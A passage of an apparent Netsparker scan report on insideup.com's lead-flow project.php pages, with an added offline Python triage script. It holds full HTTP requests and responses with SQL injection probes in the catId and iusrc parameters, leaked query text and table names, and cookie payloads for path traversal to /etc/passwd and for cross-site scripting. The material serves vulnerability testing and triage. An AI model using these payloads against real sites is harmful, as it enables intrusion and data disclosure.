convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
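The responses above are the whole finding: the application echoes the statement it tried to run, followed by MySQL's parser error. Two things in that echo matter more than the error itself. First, the statement compares `project_page_url` against the full decoded request URI (once as sent, once with a trailing slash), so every query-string parameter on every copy of `project.php` lands inside the SQL string, which is why the scanner reports `catId` and `iusrc` separately on `phsy00`, `meac00` and `inco00`. Second, the probe is Microsoft SQL Server syntax (`convert(int, ...)` over `syscolumns`); MySQL's `CONVERT()` does not accept `int` as a target type, so its parser stops at `'int,CHAR(95)...'` and reports a syntax error, which both confirms the back end is MySQL and shows the quote was not escaped. The following script is an added triage helper, not part of the Netsparker report or the site's code. It runs offline over an abbreviated copy of the `meac00` response body and the `catId` value from the Parameters table (both constructed here from the text above; the UNIONed SELECTs after the first are dropped), decodes the `CHAR()` chain to the scanner's marker, checks that the probe was reflected verbatim, and lists the application tables the error discloses, leaving out the `syscolumns` name that came from the probe.

```python
import re

# Constructed sample: the start of the body returned for
# /ppc/leadflow/meac00/project.php above, with only the first of the
# UNIONed SELECTs kept, followed by MySQL's error text as echoed.
SAMPLE_BODY = (
    "select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url "
    "from lead_flow_one_pages_details prj "
    "left join sub_category cats on cats.sub_category_id = prj.catId "
    "left join lead_flow_template temps on temps.template_id = prj.templateId "
    "left join lead_flow_group grps on grps.group_id = prj.groupId "
    "where prj.project_page_url = 'leadflow/meac00/project.php?catId='+ (select "
    "convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)"
    "+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc'"
    "You have an error in your SQL syntax; check the manual that corresponds to "
    "your MySQL server version for the right syntax to use near 'int,CHAR(95)+"
    "CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5"
)

# The catId value from the report's Parameters table, URL-decoded as the server saw it.
SAMPLE_PAYLOAD = (
    "'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)"
    "+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'"
)

MYSQL_ERROR_RE = re.compile(
    r"You have an error in your SQL syntax;.*?at line (\d+)", re.S)
CHAR_CHAIN_RE = re.compile(r"(?:CHAR\(\d+\)\+)+CHAR\(\d+\)")
TABLE_RE = re.compile(r"\b(?:from|join)\s+([A-Za-z_]\w*)", re.I)


def decode_char_chain(chain):
    """Turn CHAR(95)+CHAR(33)+... into the string it concatenates to."""
    return "".join(chr(int(n)) for n in re.findall(r"CHAR\((\d+)\)", chain))


def split_query_and_error(body):
    """Return (echoed_sql, mysql_error_text, error_line); error fields are None
    when the body carries no MySQL syntax error."""
    m = MYSQL_ERROR_RE.search(body)
    if m is None:
        return body, None, None
    return body[:m.start()], m.group(0), int(m.group(1))


def table_names(sql):
    """Identifiers that follow FROM or JOIN in the echoed statement, in order."""
    seen = []
    for name in TABLE_RE.findall(sql):
        if name not in seen:
            seen.append(name)
    return seen


def triage(body, payload):
    """Summarise what one error-based response proves and what it leaks."""
    sql, err, line = split_query_and_error(body)
    markers = sorted({decode_char_chain(c) for c in CHAR_CHAIN_RE.findall(sql)})
    probe_tables = set(TABLE_RE.findall(payload))  # e.g. syscolumns, sent by the scanner
    return {
        "backend_is_mysql": err is not None,
        "error_line": line,
        "payload_reflected_verbatim": payload in sql,   # quote not escaped
        "markers": markers,                              # scanner's CHAR() marker, decoded
        "app_tables": [t for t in table_names(sql) if t not in probe_tables],
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_BODY, SAMPLE_PAYLOAD).items():
        print(f"{key}: {value}")
```

The decoded marker is `_!@2dilemma`, the string the scanner expects to see only if its expression is evaluated; here it never is, and the finding rests instead on the unescaped quote reaching the parser and the statement being echoed in full. Feed `triage()` the other three bodies above and the table list is identical, which is the practical hint that one shared include builds this lookup for every `project.php` copy.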
- /ppc/leadflow/inco00/project.php

/ppc/leadflow/inco00/project.php

http://www.insideup.com/ppc/leadflow/inco00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2B..

Parameters

Parameter Type Value
catId GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
iusrc GET iupsc

Request

GET /ppc/leadflow/inco00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:33 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=qei7ktqh0ftp7m3fhbsd54db26; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/phsy00/project.php

/ppc/leadflow/phsy00/project.php

http://www.insideup.com/ppc/leadflow/phsy00/project.php?catId=110009&iusrc='%2B%20(select+convert(in..

Parameters

Parameter Type Value
catId GET 110009
iusrc GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /ppc/leadflow/phsy00/project.php?catId=110009&iusrc='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:59 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=add482e3u38tj137540fr8snd4; path=/
Content-Length: 4153
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+ (select 